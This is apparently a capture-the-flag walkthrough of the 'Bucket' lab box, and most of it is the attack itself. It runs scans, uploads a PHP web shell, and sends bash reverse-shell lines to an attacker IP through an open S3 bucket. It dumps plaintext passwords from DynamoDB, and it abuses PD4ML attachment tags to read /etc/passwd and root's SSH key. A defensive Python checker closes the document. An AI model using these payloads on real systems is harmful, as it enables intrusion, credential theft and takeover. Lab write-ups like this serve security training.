
Bucket

AWS CLI Command Reference

AWS DynamoDB Command Documentation

└─$ sudo nmap 10.10.10.212 -p- --min-rate=10000 -T4 -sCV  
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://bucket.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

└─$ echo "10.10.10.212 bucket.htb" | sudo tee -a /etc/hosts 

http://bucket.htb/

View source code

<article>
<div class="coffee">
<img src="http://s3.bucket.htb/adserver/images/bug.jpg" alt="Bug" height="160" width="160">
</div>
<div class="description">
<h3>Bug Bounty and 0day Research</h3>
<span>march 17, 2020 | Security</span>
<p>Customised bug bounty and new 0day feeds. Feeds can be used on TV, mobile, desktop and web applications. Collecting security feeds from 100+ different trusted sources around the world.</p>
</div>
</article>
<div class="articles">

<article>
<div class="coffee">
<img src="http://s3.bucket.htb/adserver/images/malware.png" alt="Malware" height="160" width="160">
</div>
<div class="description">
<h3>Ransomware Alerts</h3>
<span>march 17, 2020 | Malware</span>
<p>Run awareness ad campaigns on Ransomwares and other newly found malwares. Choose different types of malwares to fit for your campaign</p>
</div>
</article>

<article>
<div class="coffee">
<img src="http://s3.bucket.htb/adserver/images/cloud.png" alt="cheer" height="160" width="160">
</div>
<div class="description">
<h3>Cloud Updates</h3>
<span>march 17, 2020 | Cloud</span>
<p>Stay tuned to cloud technology updates. A superior alternative to Push Notifications and SMS A2P alerts. </p>
</div>
</article>

└─$ echo "10.10.10.212 s3.bucket.htb" | sudo tee -a /etc/hosts 

Then refresh the website and the images will load.

email: support@bucket.htb

└─$ wfuzz -c -u http://bucket.htb/ -H "Host: FUZZ.bucket.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt --hl 9


└─$ curl -v http://s3.bucket.htb/
*   Trying 10.10.10.212:80...
* Connected to s3.bucket.htb (10.10.10.212) port 80
> GET / HTTP/1.1
> Host: s3.bucket.htb
> User-Agent: curl/8.4.0
> Accept: */*
> 
< HTTP/1.1 404 
< Date: Thu, 22 Feb 2024 01:15:14 GMT
< Server: hypercorn-h11
< content-type: text/html; charset=utf-8
< content-length: 21
< access-control-allow-origin: *
< access-control-allow-methods: HEAD,GET,PUT,POST,DELETE,OPTIONS,PATCH
< access-control-allow-headers: authorization,content-type,content-md5,cache-control,x-amz-content-sha256,x-amz-date,x-amz-security-token,x-amz-user-agent,x-amz-target,x-amz-acl,x-amz-version-id,x-localstack-target,x-amz-tagging
< access-control-expose-headers: x-amz-version-id
< 
* Connection #0 to host s3.bucket.htb left intact

{"status": "running"}  

# Test PUT (upload)
curl -X PUT --data-binary "test" http://s3.bucket.htb/adserver/test.txt

echo '<?php system($_GET["cmd"]); ?>' > shell.php

# successfully uploaded to the bucket, but cannot be executed
curl -X PUT -H "Content-Type: application/x-httpd-php" --data-binary "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/10.10.15.103/4444 0>&1'\"); ?>" http://s3.bucket.htb/adserver/shell.php

curl -X PUT --data-binary "AddType application/x-httpd-php .php" http://s3.bucket.htb/adserver/.htaccess
sudo apt install awscli

# list bucket
aws --endpoint-url=http://s3.bucket.htb s3 ls

Unable to locate credentials. You can configure credentials by running "aws configure".

# configure the keys by using a random credential
aws configure 

AWS Access Key ID [None]: test
AWS Secret Access Key [None]: test
Default region name [None]: us-east-1
Default output format [None]: 

aws --endpoint-url=http://s3.bucket.htb s3 ls
2025-04-24 07:46:03 adserver

# list content in s3 bucket
aws --endpoint-url=http://s3.bucket.htb s3 ls s3://adserver
                           PRE images/
2025-04-24 07:46:04       5344 index.html

aws --endpoint-url=http://s3.bucket.htb s3 cp shell.php s3://adserver
upload: ./shell.php to s3://adserver/shell.php

http://bucket.htb/shell.php?cmd=id


If you request shell.php through the S3 bucket URL instead, the file is downloaded rather than executed.

http://s3.bucket.htb/shell.php?cmd=id

The uploaded files will be deleted in minutes.

echo "<?php exec('/bin/bash -c \"bash -i >& /dev/tcp/10.10.15.103/4444 0>&1 \"'); ?>" > shell.php

aws --endpoint-url=http://s3.bucket.htb s3 cp shell.php s3://adserver
upload: ./shell.php to s3://adserver/shell.php


# obtain a stable, interactive shell
python3 -c 'import pty;pty.spawn("/bin/bash");'
CTRL + Z
stty raw -echo
/home/roy/project$ cat db.php
cat db.php
<?php
require 'vendor/autoload.php';
date_default_timezone_set('America/New_York');
use Aws\DynamoDb\DynamoDbClient;
use Aws\DynamoDb\Exception\DynamoDbException;

$client = new Aws\Sdk([
    'profile' => 'default',
    'region'  => 'us-east-1',
    'version' => 'latest',
    'endpoint' => 'http://localhost:4566'
]);

$dynamodb = $client->createDynamoDb();

//todo

$ aws configure
aws configure
AWS Access Key ID [None]: test
AWS Secret Access Key [None]: test
Default region name [None]: us-east-1
Default output format [None]: 

[Errno 13] Permission denied: '/var/www/.aws'

$ mkdir /tmp/f
$ export HOME=/tmp/f

$ aws configure
aws configure
AWS Access Key ID [None]: test
AWS Secret Access Key [None]: test
Default region name [None]: us-east-1
Default output format [None]: 

# List all tables in DynamoDB
$ aws --endpoint-url=http://localhost:4566 dynamodb list-tables

{
    "TableNames": [
        "users"
    ]
}

$ aws --endpoint-url=http://localhost:4566 dynamodb scan --table-name users

{
    "Items": [
        {
            "password": {
                "S": "Management@#1@#"
            },
            "username": {
                "S": "Mgmt"
            }
        },
        {
            "password": {
                "S": "Welcome123!"
            },
            "username": {
                "S": "Cloudadm"
            }
        },
        {
            "password": {
                "S": "n2vM-<_K_Q:.Aa2"
            },
            "username": {
                "S": "Sysadm"
            }
        }
    ],
    "Count": 3,
    "ScannedCount": 3,
    "ConsumedCapacity": null
}

Roy

roy:n2vM-<_K_Q:.Aa2

$ netstat -tunl
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:4566          0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:34821         0.0.0.0:*               LISTEN     
tcp6       0      0 :::80                   :::*                    LISTEN     
tcp6       0      0 :::22                   :::*                    LISTEN     
udp        0      0 127.0.0.53:53           0.0.0.0:* 
roy@bucket:/var/www/bucket-app$ cat index.php
<?php
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;
if($_SERVER["REQUEST_METHOD"]==="POST") {
        if($_POST["action"]==="get_alerts") {
                date_default_timezone_set('America/New_York');
                $client = new DynamoDbClient([
                        'profile' => 'default',
                        'region'  => 'us-east-1',
                        'version' => 'latest',
                        'endpoint' => 'http://localhost:4566'
                ]);

                $iterator = $client->getIterator('Scan', array(
                        'TableName' => 'alerts',
                        'FilterExpression' => "title = :title",
                        'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
                ));
                foreach ($iterator as $item) {
                        $name=rand(1,10000).'.html';
                        file_put_contents('files/'.$name,$item["data"]);
                }
                passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
        }
}
else
{
?>

The above code connects to the DynamoDB service and scans the alerts table, filtering on title. Any item whose title is Ransomware has its data value written to a randomly named HTML file inside the files folder, and the PD4ML utility then converts the HTML contents to a PDF file. Listing the tables earlier showed that no alerts table is present in the DynamoDB database.

$ ssh -L 8000:127.0.0.1:8000 roy@bucket.htb


pd4ml_demo.jar is used to create PDFs by the site on port 8000.

# create alerts table, the table will be automatically deleted in minutes

aws --endpoint-url=http://localhost:4566 dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S --key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5


aws --endpoint-url=http://localhost:4566 dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"<html><h1>test</h1></html>"}}'

{
    "ConsumedCapacity": {
        "TableName": "alerts",
        "CapacityUnits": 1.0
    }
}

# on Kali
curl http://localhost:8000/index.php -d 'action=get_alerts'


We see that the PDF is indeed created with HTML that we provided in the database. Checking the supported HTML tags for pd4ml reveals that we can also embed an external resource as PDF attachment using the attachment tag.

This feature no longer seems to exist in the latest version.

<pd4ml:attachment src="http://pd4ml.com/i/logo.png" description="test"
icon="Paperclip"/>

<html><pd4ml:attachment src="file:///etc/passwd" description="test"
icon="Paperclip"/></html>
aws --endpoint-url=http://localhost:4566 dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"<html><pd4ml:attachment src=\"file:///etc/passwd\" description=\"test\" icon=\"Paperclip\"/></html>"}}'

aws --endpoint-url=http://localhost:4566 dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"<html><pd4ml:attachment src='\''file:///etc/passwd'\'' description='\''test'\'' icon='\''Paperclip'\''/></html>"}}'


aws --endpoint-url=http://localhost:4566 dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"<html><pd4ml:attachment src='\''file:///root/'\'' description='\''test'\'' icon='\''Paperclip'\''/></html>"}}'

aws --endpoint-url=http://localhost:4566 dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"<html><pd4ml:attachment src='\''file:///root/.ssh/id_rsa'\'' description='\''test'\'' icon='\''Paperclip'\''/></html>"}}'
chmod 600 id_rsa
ssh -i id_rsa root@bucket.htb
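
A defender-side check for the data flow described above, added here as an example (it is not code from the box or from PD4ML): it walks a DynamoDB Scan result in the JSON shape shown earlier and flags stored HTML that uses pd4ml: converter tags or non-HTTP URL schemes before that HTML reaches the PDF converter. The function name, the scheme allow-list and the sample items are assumptions constructed for illustration.

```python
import json
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}  # assumption: rendering only needs web resources
URL_ATTRS = {"src", "href", "data", "background"}


class _HtmlAudit(HTMLParser):
    """Collects reasons why a stored HTML fragment should not be rendered."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # Tag names arrive lower-cased; self-closing tags also land here.
        if tag.startswith("pd4ml:"):
            self.findings.append(f"converter tag <{tag}>")
        for name, value in attrs:
            if name in URL_ATTRS and value:
                scheme = urlparse(value.strip()).scheme.lower()
                if scheme and scheme not in ALLOWED_SCHEMES:
                    self.findings.append(f"{name} uses {scheme}: scheme")


def audit_scan(scan_json, attr="data"):
    """Return [(item_index, findings)] for items whose HTML is unsafe to render."""
    flagged = []
    for index, item in enumerate(json.loads(scan_json).get("Items", [])):
        parser = _HtmlAudit()
        parser.feed(item.get(attr, {}).get("S", ""))
        parser.close()
        if parser.findings:
            flagged.append((index, parser.findings))
    return flagged


# Constructed sample in the shape `aws dynamodb scan --table-name alerts` returns.
SAMPLE_SCAN = json.dumps({"Items": [
    {"title": {"S": "Ransomware"}, "data": {"S": "<html><h1>test</h1></html>"}},
    {"title": {"S": "Ransomware"}, "data": {"S":
        '<html><pd4ml:attachment src="file:///etc/passwd" '
        'description="test" icon="Paperclip"/></html>'}},
    {"title": {"S": "Ransomware"}, "data": {"S":
        '<img src="http://s3.bucket.htb/adserver/images/bug.jpg">'}},
], "Count": 3, "ScannedCount": 3})

if __name__ == "__main__":
    for index, findings in audit_scan(SAMPLE_SCAN):
        print(index, findings)
```

The same filter belongs in front of the converter call in index.php; running the converter as an unprivileged user limits what any missed file: reference can read.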